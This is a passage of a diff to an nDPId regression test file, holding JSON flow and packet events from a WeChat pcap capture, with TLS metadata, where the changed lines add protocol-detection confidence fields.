O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="}
@@ -136,108 +136,108 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
